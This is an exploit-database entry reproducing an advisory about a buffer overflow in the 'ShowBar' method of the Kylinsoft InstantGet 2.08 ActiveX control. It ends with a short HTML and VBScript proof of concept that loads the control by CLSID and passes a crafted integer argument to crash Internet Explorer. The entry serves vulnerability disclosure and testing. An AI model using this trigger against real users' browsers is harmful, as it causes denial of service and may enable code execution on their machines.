Kylinsoft InstantGet 2.08 - ActiveX Control 'ShowBar' Method Buffer Overflow Vulnerability

2009-09-19T00:00:00
ID EDB-ID:34442
Type exploitdb
Reporter the_Edit0r
Modified 2009-09-19T00:00:00

Description

Kylinsoft InstantGet 2.08 ActiveX Control 'ShowBar' Method Buffer Overflow Vulnerability. Dos exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/42418/info

Kylinsoft InstantGet ActiveX control is prone to a buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it into an insufficiently sized memory buffer.

An attacker can exploit this issue to execute arbitrary code within the context of the application, typically Internet Explorer, that uses the ActiveX control. Failed exploit attempts will result in denial-of-service conditions.

Kylinsoft InstantGet 2.08 is vulnerable; other versions may also be affected.

<object classid='clsid:98C92840-EB1C-40BD-B6A5-395EC9CD6510' id='target' />

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language='vbscript'>

arg1=-2147483647

target.ShowBar arg1 

</script>
</span></span>
</code></pre>